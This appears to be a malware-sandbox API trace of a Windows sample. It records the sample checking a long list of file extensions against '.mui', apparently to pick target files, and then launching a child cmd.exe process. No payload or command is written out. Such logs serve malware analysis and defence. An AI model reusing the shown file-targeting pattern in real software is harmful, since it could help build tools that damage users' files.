	[0043.608] lstrcmpiW (lpString1=".php4", lpString2="l.mui") returned -1
	[0043.608] lstrlenW (lpString=".php5") returned 5
	[0043.608] lstrcmpiW (lpString1=".php5", lpString2="l.mui") returned -1
	[0043.608] lstrlenW (lpString=".phtml") returned 6
	[0043.609] lstrcmpiW (lpString1=".phtml", lpString2="ll.mui") returned -1
	[0043.609] lstrlenW (lpString=".pict") returned 5
	[0043.609] lstrcmpiW (lpString1=".pict", lpString2="l.mui") returned -1
	[0043.609] lstrlenW (lpString=".pl") returned 3
	[0043.609] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1
	[0043.609] lstrlenW (lpString=".pls") returned 4
	[0043.609] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1
	[0043.609] lstrlenW (lpString=".pm") returned 3
	[0043.609] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1
	[0043.609] lstrlenW (lpString=".png") returned 4
	[0043.609] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1
	[0043.609] lstrlenW (lpString=".pnm") returned 4
	[0043.609] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1
	[0043.609] lstrlenW (lpString=".pot") returned 4
	[0043.609] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1
	[0043.609] lstrlenW (lpString=".potm") returned 5
	[0043.609] lstrcmpiW (lpString1=".potm", lpString2="l.mui") returned -1
	[0043.609] lstrlenW (lpString=".potx") returned 5
	[0043.609] lstrcmpiW (lpString1=".potx", lpString2="l.mui") returned -1
	[0043.609] lstrlenW (lpString=".ppa") returned 4
	[0043.609] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1
	[0043.609] lstrlenW (lpString=".ppam") returned 5
	[0043.609] lstrcmpiW (lpString1=".ppam", lpString2="l.mui") returned -1
	[0043.609] lstrlenW (lpString=".ppm") returned 4
	[0043.609] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1
	[0043.609] lstrlenW (lpString=".pps") returned 4
	[0043.609] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1
	[0043.609] lstrlenW (lpString=".ppsm") returned 5
	[0043.609] lstrcmpiW (lpString1=".ppsm", lpString2="l.mui") returned -1
	[0043.609] lstrlenW (lpString=".ppt") returned 4
	[0043.609] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0043.609] lstrlenW (lpString=".pptm") returned 5
	[0043.609] lstrcmpiW (lpString1=".pptm", lpString2="l.mui") returned -1
	[0043.609] lstrlenW (lpString=".pptx") returned 5
	[0043.609] lstrcmpiW (lpString1=".pptx", lpString2="l.mui") returned -1
	[0043.610] lstrlenW (lpString=".prn") returned 4
	[0043.610] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".ps") returned 3
	[0043.610] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1
	[0043.610] lstrlenW (lpString=".psb") returned 4
	[0043.610] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".psd") returned 4
	[0043.610] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".pst") returned 4
	[0043.610] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".ptx") returned 4
	[0043.610] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".pub") returned 4
	[0043.610] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".pwm") returned 4
	[0043.610] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".pxr") returned 4
	[0043.610] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".py") returned 3
	[0043.610] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1
	[0043.610] lstrlenW (lpString=".qt") returned 3
	[0043.610] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1
	[0043.610] lstrlenW (lpString=".r3d") returned 4
	[0043.610] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".raf") returned 4
	[0043.610] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".rar") returned 4
	[0043.610] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0043.610] lstrlenW (lpString=".raw") returned 4
	[0043.610] lstrcmpiW (lpString1=".raw", lpString2=".mui") returned 1

Thread:
	id = 22
	os_tid = 0x9bc


Thread:
	id = 26
	os_tid = 0xa44


Process:
	id = "2"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x4ffda000"
	os_pid = "0x948"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x934"
	cmd_line = "\"C:\\Windows\\system32\\cmd.exe\""
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 3
	os_tid = 0x94c

	[0032.240] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13f770 | out: lpSystemTimeAsFileTime=0x13f770*(dwLowDateTime=0xf284ea40, dwHighDateTime=0x1d58eed)) 
	[0032.240] GetCurrentProcessId () returned 0x948
	[0032.240] GetCurrentThreadId () returned 0x94c
	[0032.240] GetTickCount () returned 0x1142e32
	[0032.241] QueryPerformanceCounter (in: lpPerformanceCount=0x13f778 | out: lpPerformanceCount=0x13f778*=15216250604) returned 1
	[0032.241] GetModuleHandleW (lpModuleName=0x0) returned 0x4a4f0000
	[0032.241] __set_app_type (_Type=0x1) 
	[0032.242] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a517810) returned 0x0
	[0032.242] __getmainargs (in: _Argc=0x4a53a608, _Argv=0x4a53a618, _Env=0x4a53a610, _DoWildCard=0, _StartInfo=0x4a51e0f4 | out: _Argc=0x4a53a608, _Argv=0x4a53a618, _Env=0x4a53a610) returned 0
	[0032.242] GetCurrentThreadId () returned 0x94c
	[0032.242] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x94c) returned 0x3c
	[0032.243] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0032.243] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40
	[0032.243] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0032.243] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0032.243] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x13f708 | out: phkResult=0x13f708*=0x0) returned 0x2
	[0032.243] VirtualQuery (in: lpAddress=0x13f6f0, lpBuffer=0x13f670, dwLength=0x30 | out: lpBuffer=0x13f670*(BaseAddress=0x13f000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0032.243] VirtualQuery (in: lpAddress=0x40000, lpBuffer=0x13f670, dwLength=0x30 | out: lpBuffer=0x13f670*(BaseAddress=0x40000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0032.243] VirtualQuery (in: lpAddress=0x41000, lpBuffer=0x13f670, dwLength=0x30 | out: lpBuffer=0x13f670*(BaseAddress=0x41000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0032.243] VirtualQuery (in: lpAddress=0x44000, lpBuffer=0x13f670, dwLength=0x30 | out: lpBuffer=0x13f670*(BaseAddress=0x44000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0032.243] VirtualQuery (in: lpAddress=0x140000, lpBuffer=0x13f670, dwLength=0x30 | out: lpBuffer=0x13f670*(BaseAddress=0x140000, AllocationBase=0x140000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0032.243] GetConsoleOutputCP () returned 0x1b5
	[0032.243] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a52bfe0 | out: lpCPInfo=0x4a52bfe0) returned 1
	[0032.244] SetConsoleCtrlHandler (HandlerRoutine=0x4a513184, Add=1) returned 1
	[0032.244] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.244] SetConsoleMode (hConsoleHandle=0xf8, dwMode=0x0) returned 0
	[0032.244] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.244] GetConsoleMode (in: hConsoleHandle=0xf8, lpMode=0x4a51e194 | out: lpMode=0x4a51e194) returned 0
	[0032.244] _get_osfhandle (_FileHandle=0) returned 0xec
	[0032.244] GetConsoleMode (in: hConsoleHandle=0xec, lpMode=0x4a51e198 | out: lpMode=0x4a51e198) returned 0
	[0032.244] GetEnvironmentStringsW () returned 0x308a60*
	[0032.245] GetProcessHeap () returned 0x2f0000
	[0032.245] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x3094f0
	[0032.245] FreeEnvironmentStringsW (penv=0x308a60) returned 1
	[0032.245] GetProcessHeap () returned 0x2f0000
	[0032.245] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x8) returned 0x3088e0
	[0032.245] GetEnvironmentStringsW () returned 0x308a60*
	[0032.245] GetProcessHeap () returned 0x2f0000
	[0032.245] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x309f80
	[0032.245] FreeEnvironmentStringsW (penv=0x308a60) returned 1
	[0032.245] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x13e5c8 | out: phkResult=0x13e5c8*=0x44) returned 0x0
	[0032.245] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x0, lpData=0x13e5e0*=0x18, lpcbData=0x13e5c4*=0x1000) returned 0x2
	[0032.245] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x4, lpData=0x13e5e0*=0x1, lpcbData=0x13e5c4*=0x4) returned 0x0
	[0032.245] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x0, lpData=0x13e5e0*=0x1, lpcbData=0x13e5c4*=0x1000) returned 0x2
	[0032.245] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x4, lpData=0x13e5e0*=0x0, lpcbData=0x13e5c4*=0x4) returned 0x0
	[0032.245] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x4, lpData=0x13e5e0*=0x40, lpcbData=0x13e5c4*=0x4) returned 0x0
	[0032.245] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x4, lpData=0x13e5e0*=0x40, lpcbData=0x13e5c4*=0x4) returned 0x0
	[0032.245] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x0, lpData=0x13e5e0*=0x40, lpcbData=0x13e5c4*=0x1000) returned 0x2
	[0032.245] RegCloseKey (hKey=0x44) returned 0x0
	[0032.245] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x13e5c8 | out: phkResult=0x13e5c8*=0x44) returned 0x0
	[0032.246] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x0, lpData=0x13e5e0*=0x40, lpcbData=0x13e5c4*=0x1000) returned 0x2
	[0032.246] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x4, lpData=0x13e5e0*=0x1, lpcbData=0x13e5c4*=0x4) returned 0x0
	[0032.246] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x0, lpData=0x13e5e0*=0x1, lpcbData=0x13e5c4*=0x1000) returned 0x2
	[0032.246] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x4, lpData=0x13e5e0*=0x0, lpcbData=0x13e5c4*=0x4) returned 0x0
	[0032.246] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x4, lpData=0x13e5e0*=0x9, lpcbData=0x13e5c4*=0x4) returned 0x0
	[0032.246] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x4, lpData=0x13e5e0*=0x9, lpcbData=0x13e5c4*=0x4) returned 0x0
	[0032.246] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x13e5c0, lpData=0x13e5e0, lpcbData=0x13e5c4*=0x1000 | out: lpType=0x13e5c0*=0x0, lpData=0x13e5e0*=0x9, lpcbData=0x13e5c4*=0x1000) returned 0x2
	[0032.246] RegCloseKey (hKey=0x44) returned 0x0
	[0032.246] time (in: timer=0x0 | out: timer=0x0) returned 0x5db93216
	[0032.246] srand (_Seed=0x5db93216) 
	[0032.246] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\""
	[0032.246] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\""
	[0032.246] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a52c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0032.246] GetProcessHeap () returned 0x2f0000
	[0032.246] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x30aa10
	[0032.246] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30aa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0032.246] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0032.247] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0032.247] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0032.247] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0032.247] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0032.247] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0032.247] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0032.247] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0032.247] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0032.247] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0032.247] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0032.247] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0032.247] GetProcessHeap () returned 0x2f0000
	[0032.247] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3094f0 | out: hHeap=0x2f0000) returned 1
	[0032.247] GetEnvironmentStringsW () returned 0x308a60*
	[0032.247] GetProcessHeap () returned 0x2f0000
	[0032.247] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa94) returned 0x30ac30
	[0032.247] FreeEnvironmentStringsW (penv=0x308a60) returned 1
	[0032.247] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0032.247] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0032.247] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0032.247] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0032.247] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0032.247] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0032.247] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0032.247] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0032.247] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0032.247] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0032.248] GetProcessHeap () returned 0x2f0000
	[0032.248] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x5c) returned 0x30b6d0
	[0032.248] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x13f3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0032.248] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x13f3d0, lpFilePart=0x13f3b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x13f3b0*="Desktop") returned 0x25
	[0032.248] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0032.248] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x13f0e0 | out: lpFindFileData=0x13f0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x30b740
	[0032.248] FindClose (in: hFindFile=0x30b740 | out: hFindFile=0x30b740) returned 1
	[0032.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x13f0e0 | out: lpFindFileData=0x13f0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x30b740
	[0032.248] FindClose (in: hFindFile=0x30b740 | out: hFindFile=0x30b740) returned 1
	[0032.248] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20
	[0032.248] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x13f0e0 | out: lpFindFileData=0x13f0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xea31df60, ftLastAccessTime.dwHighDateTime=0x1d58eed, ftLastWriteTime.dwLowDateTime=0xea31df60, ftLastWriteTime.dwHighDateTime=0x1d58eed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x30b740
	[0032.248] FindClose (in: hFindFile=0x30b740 | out: hFindFile=0x30b740) returned 1
	[0032.248] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0032.248] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1
	[0032.248] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1
	[0032.249] GetProcessHeap () returned 0x2f0000
	[0032.249] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30ac30 | out: hHeap=0x2f0000) returned 1
	[0032.249] GetEnvironmentStringsW () returned 0x30b740*
	[0032.249] GetProcessHeap () returned 0x2f0000
	[0032.249] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xae8) returned 0x30c230
	[0032.249] FreeEnvironmentStringsW (penv=0x30b740) returned 1
	[0032.249] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a52c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0032.249] GetProcessHeap () returned 0x2f0000
	[0032.249] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30b6d0 | out: hHeap=0x2f0000) returned 1
	[0032.249] GetProcessHeap () returned 0x2f0000
	[0032.249] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4016) returned 0x30cd20
	[0032.249] GetProcessHeap () returned 0x2f0000
	[0032.249] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30cd20 | out: hHeap=0x2f0000) returned 1
	[0032.249] GetConsoleOutputCP () returned 0x1b5
	[0032.249] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a52bfe0 | out: lpCPInfo=0x4a52bfe0) returned 1
	[0032.249] GetUserDefaultLCID () returned 0x409
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a527b50, cchData=8 | out: lpLCData=":") returned 2
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x13f4e0, cchData=128 | out: lpLCData="0") returned 2
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x13f4e0, cchData=128 | out: lpLCData="0") returned 2
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x13f4e0, cchData=128 | out: lpLCData="1") returned 2
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a53a740, cchData=8 | out: lpLCData="/") returned 2
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a53a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a53a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a53a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a53a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a53a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a53a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0032.250] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a53a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0032.251] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a527b40, cchData=8 | out: lpLCData=".") returned 2
	[0032.251] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a53a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0032.251] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0032.251] GetProcessHeap () returned 0x2f0000
	[0032.251] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20c) returned 0x3095c0
	[0032.251] GetConsoleTitleW (in: lpConsoleTitle=0x3095c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0032.253] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.253] GetFileType (hFile=0xf8) returned 0x3
	[0032.253] BrandingFormatString () returned 0x3097e0
	[0032.258] GetVersion () returned 0x1db10106
	[0032.258] _vsnwprintf (in: _Buffer=0x13f650, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x13f5e8 | out: _Buffer="6.1.7601") returned 8
	[0032.258] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.258] GetFileType (hFile=0xf8) returned 0x3
	[0032.258] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a536340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e
	[0032.259] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a536340, nSize=0x2000, Arguments=0x13f5f0 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24
	[0032.259] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.259] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a52c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37
	[0032.259] WriteFile (in: hFile=0xf8, lpBuffer=0x4a52c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x13f578, lpOverlapped=0x0 | out: lpBuffer=0x4a52c320*, lpNumberOfBytesWritten=0x13f578*=0x24, lpOverlapped=0x0) returned 1
	[0032.259] _vsnwprintf (in: _Buffer=0x4a536340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x13f618 | out: _Buffer="\r\n") returned 2
	[0032.259] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0032.259] GetFileType (hFile=0xf8) returned 0x3
	[0032.259] _get_osfhandle (_FileHandle=1) returned 0xf8
